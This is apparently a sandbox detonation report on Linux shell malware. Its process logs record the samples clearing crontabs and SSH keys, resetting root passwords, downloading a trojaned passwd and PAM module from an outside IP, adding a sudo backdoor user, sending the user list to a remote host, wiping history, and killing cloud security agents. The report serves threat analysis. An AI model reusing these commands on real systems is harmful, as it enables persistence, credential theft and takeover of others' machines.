[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.ze42Od3Syf /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.ze42Od3Syf]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/样本/Linux/shc加密脚本/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

/usr/bin/chmod

[chmod 4755 /bin/passwd]

/usr/bin/chmod

[chmod u+s /bin/passwd]

/usr/bin/cp

[cp /bin/passwd /usr/bin/passwd]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/pam_tms]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/pam_tms]

/usr/bin/chmod

[chmod +x /sbin/pam_tms]

/usr/bin/grep

[grep -q pam_tms /etc/pam.d/common-auth]

/usr/sbin/useradd

[useradd cheeki]

/usr/sbin/usermod

[usermod -aG sudo cheeki]

/usr/sbin/usermod

[usermod -aG wheel cheeki]

/usr/sbin/usermod

[usermod -p $6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/ cheeki]

/usr/bin/mv

[mv /var/tmp/.xrx/key /home/cheeki/.ssh/authorized_keys]

/usr/bin/mkdir

[mkdir /var/tmp/.x]

/usr/bin/mv

[mv /var/tmp/.xrx/secure /var/tmp/.x/secure]

/usr/bin/chmod

[chmod +x /var/tmp/.x/secure]

/var/tmp/.x/secure

[/var/tmp/.x/secure]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=]

/usr/bin/rm

[rm -rf /root/.bash_history]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/init0]

/usr/bin/rm

[rm -rf init0]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
SE 194.71.11.173:80 se.archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
CH 179.43.154.189:1010 tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

MD5 41d685bb374b8b9765cc8ad68c6ddd7c
SHA1 4d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256 aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512 b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0

/var/log/apt/eipp.log.xz

MD5 cc6206f59ec7a64c75f24e79d19c69f7
SHA1 9e5ede07f6b85a9105aa234fa3e78898c3997fb2
SHA256 a961625a91f21ebeed9d5b96cd4063dd72a067d1c41884809f5590573471fad5
SHA512 ce257843f03d72692c7890df5f59943263144314f5fd817bff690458ec26096bb3dec1bd87beb8310580e86618f28282bb1b26366f832ab2eb5ccd8f8ff12c2f

/var/lib/dpkg/updates/tmp.i

MD5 0c83c7b81780508a33c1ea43e49bd0ab
SHA1 1bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA256 9c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA512 97328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747

/var/lib/dpkg/tmp.ci/control

MD5 1e0f0dfa728ed7715510e29d0c820cfa
SHA1 9e20884889df0752af14f0afcc0a6bbdb5470c62
SHA256 7263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA512 41afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2

/var/lib/dpkg/tmp.ci/md5sums

MD5 f0183116fb005f86b0d573c6473fae9b
SHA1 6672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256 b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512 314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81

/var/lib/dpkg/updates/tmp.i

MD5 6e67dede930df3bc51a5d372940d8c75
SHA1 03a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256 087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA512 28867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b

/var/lib/dpkg/updates/tmp.i

MD5 34eb56f174133f283fdc94da47b268f3
SHA1 c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256 ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512 f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d

/var/lib/dpkg/updates/tmp.i

MD5 05ffb6efd8d30243a913f95453c376ab
SHA1 d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA256 78b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA512 4c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 fda2311561ddfd0654505fa2cf369d91
SHA1 2a1be09d3084d3e2ff26e6048f4176af376b1a76
SHA256 0675b27fe2f05cf66d498e5ec5bb6f975aed807cf55440c03bb50a6800435500
SHA512 bef483a282d05f4bee4d3f0c353588cf03e1e7db8fcb9149c1c769a30bf1d247fd74c77485fa630317eff8c4dc6dc114319fdd7526e527e6f755ddb3e1e71e4c

/var/cache/man/2486

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 fc66f74346fb6e7b8d5593e437ceb6f3
SHA1 f35dc1b6a2457ea70067c1a5e48c10ba22fce953
SHA256 e26fb022c7efc9ae568e73e8b1f2034680d977bc2af726d50ce79a69ee0ad3a9
SHA512 68949144614c196d0d1bb9a94be6aa95670080115bcdb1253d1e66fdfd8244dbeda32c6dda2c8850275fc9382da452df58aafae1c2d5f8bbb0803ce1e7d3c425

/var/lib/update-notifier/tmp.ze42Od3Syf

MD5 9e4474dd78060139ab355ed18427f88e
SHA1 e4608e740783b34ab9917ce0a4f379a9c760e725
SHA256 6e285b096a5771d3f0f75b00ea3ce4df1fa1648b6f6ba2311bd8eb5e0c90c708
SHA512 777cad103870948f8109488fe8c02a2ef616aca87319c446d305bb6ddcc01093266bcf78d1e76871937bde94e175a72b574985b33f693e7e0e542b9ed9f87706

/etc/passwd+

MD5 cea58ef2a54a8678646f9398f140d2de
SHA1 46ab8bcd243efa9c87b3859cd342f683f168e133
SHA256 ec0d3574508143d89a5ca35fcc9fe9ae0b0a1a6b0d89f47cbe17ac1d9d88072a
SHA512 9d6879919c7aeb654b27bd67292ebd5e5799cf184d5b45e4debb2d2d8666aebd1e078bfaed7cdb360d0e79a69f01aae009ff5867bf1688389e373de422177d74

/etc/shadow+

MD5 d7f0864275277cd007532a69de0bb969
SHA1 3eba640a166a326b34d0175c51edd6eba33f9460
SHA256 e563dcb02ff3f853d10b7859b126d1705f2e27df89556662a2931a18b8d3bafd
SHA512 e8a0f76dcc12c5e4147832774e6e7c0cda09f231057cb0e80233c7927146a7ba0ff0b18363c6e50a57059235d4384348486377ad53776cf7c7f5b6b0a4ef76f6

/etc/shadow+

MD5 58b187fc10137fd5ca7a8b4a724300ee
SHA1 5394e98da4b5a2aef6fc4e05f40e0203a4805439
SHA256 c4c5fe11e6ad6a9f24716c33e561763192c9c8b1c7fa81494898529d6e4f4855
SHA512 b41dc0d6e8732f7a24eea077331d22c3875168ca20f2243569a2893be7cca5061537a2484f1097f4cc148cd9e8b03004513714b970ccc92e8f5c401e743009ac

/etc/passwd+

MD5 1a2923599c03f2da0e70bc13fc7d2fcb
SHA1 7c850050beffefcd03cee16c3f74cbe63c7f9680
SHA256 bbe8f1dd9974aba408b38e18b0628341bbec08f2493973ff9b6446fa03701823
SHA512 5d8f456ad7bd9a9e4bbf677b03665ee22f1ed9479ea1fbceb004e97dbcdd9a84248c32e017b786fede7baf037c2249078e2e24bc38215d8d4f099f773494fa80

/etc/shadow+

MD5 cebff192afb08821d19a25039edc6af3
SHA1 da79d671c4d01bf02e22ce0b06c4567e1326d367
SHA256 459b3d9ebe3dc0123f0f90f99cb72485f24944f1011aaa5669686e5eb1312e3f
SHA512 6f942dab13165ddb94587c5e3887e6e77dee598fbd7159bad31690d62766c239493d93bab6fcea29f0c6c56ae81029b4f7cd5bdead79225b2ed244a1b35e9a5f

/etc/group+

MD5 b43bcab2b519b1f1d699ab5c9dc418eb
SHA1 e983ed6f5c31b3706b9d3eaf5efdcfe932d653bc
SHA256 4f94732b04d039e70819b986801ab8bb50cc056284e4b4536d46beca0f546f43
SHA512 87999a80f6d7eee4761fd0bb4948235a3133354916ee9ccb8c30eef97a895245959c3bbc7574afbea2f5071194743c15526a7d627d6e2e3edd6ff31a3bf059e9

/etc/gshadow+

MD5 9452ee212552c9f49ebca01b6291a740
SHA1 85e33b01e1d041ad6809067ed50b1770c9be478f
SHA256 363cd5c14472d9750701c768b7657d191e8e76b899b83aca2366ec6c82481669
SHA512 0427539b0dc8fd4c62a0389062a9868615f8cdd21ef4f248dc84ce999f647936b95492377e8655ad903addda37f4c8edea09a1ffdd2e7c014825e62fbfd68f7a

/etc/subuid+

MD5 4641942396624780f617210b1c564db9
SHA1 5f87f6066aed9fdc0cc1a907a397ba383731ac57
SHA256 6ed2c35ec029779fb7f08108345965c99c171908cd125934943dfc6c9a17d32e
SHA512 dccd0d158d875f145746c5efa7b1e87f458d4f1d1b91391958cb6e669ad2f8060c49bef46d79af62b521b02c4d10e8e4e50b4245bed539284eed580b3e3d23ca

/etc/group+

MD5 84eb5d846ee7bfef527db974a5feb1b2
SHA1 e811387fb348ab546f82d60d66a0c9a9c9735d36
SHA256 c11f30bbdc83688d1329289c0f5324e9aa0b0b81365eb6375b953103a2c43456
SHA512 f1fbc838ce695cb448038b8732fb054fd6f5502b6203377eb339e5bcbb8eb877c4f8c10ba5c30591eab82de3603c0a228243dfda7611eff3ae14d9813d69a25b

/etc/gshadow+

MD5 5c0e7d545ff1cfa0ba68f27349507a87
SHA1 0aa5fc2c5a8e1be03ce1bf2b4e68b82de1eb8d47
SHA256 0e4b06466a4c58fbf83afd9939466b7c2a461c27ee876cbec97afae04e53e44b
SHA512 2913398db0dcd7d719c1b455d6d62797f042f99fe8653b97bd36d3354d659d05e400b8d3729254ec793ed37876d0045628f9bd26ba566e1a4bb86c3df39b1954

/etc/shadow+

MD5 af71400bbb59d689a6d8ca145ee6a868
SHA1 6e12abb9495328fc5e424edf26998397382cd5bb
SHA256 37482af0ac86aab195e1cc081ef8ed740ea79573baf8ee14b5d80a5048367e6a
SHA512 197fc4c72429864863c9bbb6581af2f31cb5653b279c347affdace02e3668e3582f94a157a7c9ad95846e84cc8c65fde383e9d9dbd9e59ab7fb6f564d3667fea

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/168/stat /usr/bin/killall N/A
File opened for reading /proc/163/stat /usr/bin/killall N/A
File opened for reading /proc/980/cmdline /usr/bin/killall N/A
File opened for reading /proc/1287/stat /usr/bin/killall N/A
File opened for reading /proc/1074/stat /usr/bin/killall N/A
File opened for reading /proc/1050/stat /usr/bin/killall N/A
File opened for reading /proc/515/stat /usr/bin/killall N/A
File opened for reading /proc/1050/stat /usr/bin/killall N/A
File opened for reading /proc/409/cmdline /usr/bin/killall N/A
File opened for reading /proc/159/stat /usr/bin/killall N/A
File opened for reading /proc/980/stat /usr/bin/killall N/A
File opened for reading /proc/115/stat /usr/bin/killall N/A
File opened for reading /proc/318/stat /usr/bin/killall N/A
File opened for reading /proc/1123/stat /usr/bin/killall N/A
File opened for reading /proc/1012/stat /usr/bin/killall N/A
File opened for reading /proc/988/cmdline /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/409/cmdline /usr/bin/killall N/A
File opened for reading /proc/742/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/689/stat /usr/bin/killall N/A
File opened for reading /proc/1329/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/160/stat /usr/bin/killall N/A
File opened for reading /proc/953/stat /usr/bin/killall N/A
File opened for reading /proc/1464/stat /usr/bin/killall N/A
File opened for reading /proc/79/cmdline /usr/bin/killall N/A
File opened for reading /proc/754/cmdline /usr/bin/killall N/A
File opened for reading /proc/635/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/98/stat /usr/bin/killall N/A
File opened for reading /proc/1061/stat /usr/bin/killall N/A
File opened for reading /proc/1157/stat /usr/bin/killall N/A
File opened for reading /proc/1243/cmdline /usr/bin/killall N/A
File opened for reading /proc/1115/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/1273/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/1142/cmdline /usr/bin/killall N/A
File opened for reading /proc/667/stat /usr/bin/killall N/A
File opened for reading /proc/1178/cmdline /usr/bin/killall N/A
File opened for reading /proc/318/cmdline /usr/bin/killall N/A
File opened for reading /proc/1078/stat /usr/bin/killall N/A
File opened for reading /proc/583/cmdline /usr/bin/killall N/A
File opened for reading /proc/173/stat /usr/bin/killall N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/1366/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/1489/cmdline /usr/bin/killall N/A
File opened for reading /proc/1054/stat /usr/bin/killall N/A
File opened for reading /proc/408/stat /usr/bin/killall N/A
File opened for reading /proc/1115/stat /usr/bin/killall N/A
File opened for reading /proc/1127/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
GB 195.181.164.19:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/133/cmdline /usr/bin/killall N/A
File opened for reading /proc/591/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/646/cmdline /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/600/stat /usr/bin/killall N/A
File opened for reading /proc/107/cmdline /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/261/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/640/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/133/cmdline /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/96/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/663/stat /usr/bin/killall N/A
File opened for reading /proc/666/stat /usr/bin/killall N/A
File opened for reading /proc/343/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/290/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/290/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/261/stat /usr/bin/killall N/A
File opened for reading /proc/673/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/183/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/290/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/292/stat /usr/bin/killall N/A
File opened for reading /proc/591/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/300/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/265/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/292/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/639/cmdline /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/673/stat /usr/bin/killall N/A
File opened for reading /proc/300/stat /usr/bin/killall N/A
File opened for reading /proc/183/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/646/stat /usr/bin/killall N/A
File opened for reading /proc/640/cmdline /usr/bin/killall N/A
File opened for reading /proc/107/cmdline /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/673/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsel-20240611-en

Max time kernel

3s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/679/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/150/stat /usr/bin/killall N/A
File opened for reading /proc/693/cmdline /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/694/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/699/cmdline /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/727/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/210/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/727/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/117/cmdline /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/116/stat /usr/bin/killall N/A
File opened for reading /proc/341/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/117/stat /usr/bin/killall N/A
File opened for reading /proc/314/stat /usr/bin/killall N/A
File opened for reading /proc/366/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/693/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/106/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
